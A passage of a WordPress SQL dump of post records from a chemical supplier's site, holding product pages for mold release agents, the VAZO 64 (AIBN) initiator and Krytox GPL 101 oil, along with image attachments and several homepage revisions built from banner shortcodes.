the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.\r\n<h3>Numerous releases per application; No Messy transfer or post-molding cleaning</h3>\r\nThe application efficiency of ReleaSys™ composite mold release can be seen by the relatively small amounts of mold release agent that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications.To find out if semi-permanent technologies would work for your process<a href="https://www.miller-stephenson.com/tech-support/"> contact us and talk with one of our industry experts.</a>The relatively small amounts of mold release agents that need to be applied to the mold means that storage space is reduced. Products can be formulated ready-to-use -- making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications.\r\n<h3>Mold Release Agents Systems</h3>\r\nSpecific to use in molding of <strong><a href="https://www.miller-stephenson.com/composite-mold-release-agents/">composite </a></strong>and <strong><a href="https://www.miller-stephenson.com/polyurethane-mold-release-agents/">polyurethane materials</a></strong> are ReleaSys™ Mold Primers. These are an integral part of the Primer/Sealer/Release Agent combination (i.e. "the release system"), and are used to leverage the release agent properties to provide for an even greater number of releases between release agent application, along with easier release and greater part surface qualities.\r\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a></p>\r\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information which Mold release agent is right for you.</a></strong>', 'ReleaSys™ 89 | High-Performance Release Agents', 'ReleaSys 89 is a nonflammable, low odor solvent-based, semi-permanent mold release agent designed to provide superior durability and high slip across a broad range of moldable substrates. This formulation is particularly effective on difficult molding applications or abrasive substrates. ReleaSys 89 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>Exceptional durability and surface adhesion</li>\r\n 	<li>High Slip;Ideal for complex mold geometries</li>\r\n 	<li>Ideal for Composites and Urethanes</li>\r\n 	<li>Improves quality of molded parts</li>\r\n 	<li>Minimal mold build up</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'release-agents', '', '', '2017-06-04 18:00:16', '2017-06-04 18:00:16', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=425', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (426, 3, '2016-08-18 14:17:13', '2016-08-18 14:17:13', '', 'ReleaSys89', '', 'inherit', 'open', 'closed', '', 'releasys89', '', '', '2016-08-18 14:17:13', '2016-08-18 14:17:13', '', 425, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys89.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (427, 3, '2016-08-18 14:53:57', '2016-08-18 14:53:57', '<h2>VAZO 64 | Azobisisobutyronitrile</h2>\r\n<h3>AIBN Free Radical Initiator; Reliable, Predictable Initiation</h3>\r\nVAZO 64 radical initiator, also known as AIBN (Azobisisobutyronitrile), is a free radical azo initiator typically used as a polymerization initiator. VAZO 64 radical initiator is one of the most widely used initiators, which thermally decomposes to generate free radicals and nitrogen gas. More cost-effective than organic peroxides of comparable activity. Its low molecular weight allows it to be one of the most cost effective options, with a higher mole per pound than other initiators.  Benefits include:\r\n<ul>\r\n 	<li>Very Cost Effective</li>\r\n 	<li>Does not compete in costly sides reactions</li>\r\n 	<li>Head-to-Tail polymerization; Low polydispersity</li>\r\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\r\n 	<li>Can polymerize oxidation susceptible compound</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/vazo-free-radical-initiator/">For more information on Vazo radical initiators see our article section</a>\r\n\r\nAll the grades are Vazo radical Initiators are essentially insoluble in water, sparingly soluble in aliphatic hydrocarbons, and soluble in functionalized organic compounds and aromatic hydrocarbons. Vazo 67 is significantly more soluble in organic solvents and monomers than the other grades. Caution must be used in the handling of highly concentrated solutions to avoid a self-accelerating decomposition.\r\n<p class="largeText">Solvent-Soluble Vazo™ free radical sources offer a number of advantages over organic peroxides.</p>\r\n\r\n<ul>\r\n 	<li>\r\n<div>More stable than most peroxides, so can be stored under milder conditions and are not shock-sensitive.</div></li>\r\n 	<li>\r\n<div>Decompose with first-order kinetics; not sensitive to metals, acids, and bases; not susceptible to radical-induced decompositions. This makes Vazo™ free radical sources more efficient and predictable than other free radical sources.</div></li>\r\n 	<li>\r\n<div>Produce less energetic radicals than peroxides, so there is less branching and cross-linking.</div></li>\r\n 	<li>\r\n<div>Are weak oxidizing agents, which lets them be used to polymerize unsaturated amines, mercaptans, and aldehydes without affecting pigments and dyes.</div></li>\r\n 	<li>\r\n<div>Are available in four grades to use over a wide temperature range.</div></li>\r\n</ul>\r\nFor safety, the maximum storage temperatures are as follows: Vazo™ 52 (10°C [50°F]); Vazo™ 64 and Vazo™ 67 (24°C [75°F]); Vazo™ 88 (35°C [95°F]);', 'VAZO 64 | Azobisisobutyronitrile', 'Vazo 64, also known as AIBN (Azobisisobutyronitrile), is a free radical source (FRS) typically used as a polymerization initiator. Vazo 64 is one of the most widely used initiators, which thermally decomposes to generate free radicals and nitrogen gas. More cost-effective than organic peroxides of comparable activity. Its low molecular weight allows it to be one of the most cost effective options, with a higher mole per pound than other initiators. Vazo 64 is mainly used to start acrylic polymerization reactions in industrial settings.  Benefits include:\r\n<ul>\r\n 	<li>Very Cost Effective</li>\r\n 	<li>Does not compete in costly sides reactions</li>\r\n 	<li>Head-to-Tail polymerization; Low polydispersity</li>\r\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\r\n 	<li>Can polymerize oxidation susceptible compound</li>\r\n</ul>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/vazo-frs-product-banner-e1474375765567.jpg" alt="Vazo Authorized Distributor" />', 'publish', 'open', 'closed', '', 'vazo-64-radical-initiator', '', '', '2017-06-05 13:08:05', '2017-06-05 13:08:05', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=427', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (429, 3, '2016-08-18 14:53:31', '2016-08-18 14:53:31', '', 'VAZO 64', '', 'inherit', 'open', 'closed', '', 'vazo-64', '', '', '2016-08-18 14:53:31', '2016-08-18 14:53:31', '', 427, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-64.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (430, 1, '2016-08-18 15:00:43', '2016-08-18 15:00:43', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:00:43', '2016-08-18 15:00:43', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (431, 3, '2017-06-05 12:29:02', '2017-06-05 12:29:02', '<h2>MS-122SE | PTFE Mold Release Agent</h2>\n<h3>High-Performance PTFE; High Solvency Carrier Fluid; Exceptional Utility</h3>\nMS-122SE is a high performance, high solvency PTFE Mold Release Agent specifically designed for unsurpassed adhesion to mold surfaces and extended durability. The proprietary solvent blend ensures that proper wetting, leveling, and surface preparation occurs when applied yielding a durable, uniform thin-film.  MS-122SE offers the following benefits:\n<ul>\n 	<li>Superior adhesion to mold surfaces</li>\n 	<li>High Solvency/Rapid Evaporating Carrier Fluid</li>\n 	<li>Ideal for compression/injection molding</li>\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Miller-Stephenson has been developing PTFE release agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics. </span>\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Production engineers will typically choose PTFE mold release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. </span></p>\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Miller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.</span></p>\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-122SE | PTFE Mold Release Agent', 'MS-122SE is a high performance, high solvency mold release agent utilizing PTFE fluoropolymers (polytetrafluoroethylene) specifically designed for unsurpassed adhesion to mold surfaces and extended durability. The proprietary solvent blend ensures that proper wetting, leveling, and surface preparation occurs when applied yielding a durable, uniform thin-film.  MS-122SE offers the following benefits:\n<ul>\n 	<li>Superior adhesion to mold surfaces</li>\n 	<li>High Solvency/Rapid Evaporating Carrier Fluid</li>\n 	<li>Ideal for compression/injection molding</li>\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>', 'inherit', 'closed', 'closed', '', '302-autosave-v1', '', '', '2017-06-05 12:29:02', '2017-06-05 12:29:02', '', 302, 'https://132.148.10.86/wordpress/302-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (433, 1, '2016-08-18 15:03:23', '2016-08-18 15:03:23', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:03:23', '2016-08-18 15:03:23', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (434, 1, '2016-08-18 15:06:21', '2016-08-18 15:06:21', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top" link="product-category/release-agents/"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:06:21', '2016-08-18 15:06:21', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (435, 1, '2016-08-18 15:06:50', '2016-08-18 15:06:50', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top" ]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:06:50', '2016-08-18 15:06:50', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (436, 2, '2016-08-18 15:09:27', '2016-08-18 15:09:27', 'One of the greatest advantages of using Krytox GPL 101 oil is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox GPL 101 Oil is not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\nKrytox lubricants do not react with gaseous oxygen under shock loading or with liquid oxygen (LOX), nitrogen tetroxide, or inhibited red fuming nitric acid in impact tests. LOX impact tests were conducted in accordance with ASTM D2512. Other impact tests conducted at 214 J/cm2 (200 ft·lb/in2), according to the method described in ASTM Bulletin 250, also showed no reaction. Krytox lubricants have also been evaluated and certified by the BAM Federal Institute for Materials Research and Testing in Germany for reactivity with gaseous and liquid oxygen under pressure. Table 4, “Oxygen Compatibility of Krytox™ Lubricants,” shows oxygen compatibility of Krytox lubricants.\r\n\r\nKrytox GPL 100 oil is remarkably stable to radiation when compared with many materials used as lubricants or power fluids. Irradiation of Krytox lubricants causes minor depolymerization, with a consequent reduction in viscosity and formation of volatile products, but not solids or sludge. In one test exposure of a Krytox sample to an electron bombardment of 107 rad at ambient temperature in air resulted in a viscosity decrease of only 8%. The irradiated sample contained no sludge and was unchanged in appearance.\r\n', 'GPL 101', 'Krytox GPL 101 has a Oil Viscosity of 7.8 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -70°C to 104°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-101', '', '', '2016-10-04 14:58:36', '2016-10-04 14:58:36', '', 0, 'https://132.148.10.86/wordpress/product/gpl-101/', 0, 'product', '', 0); 
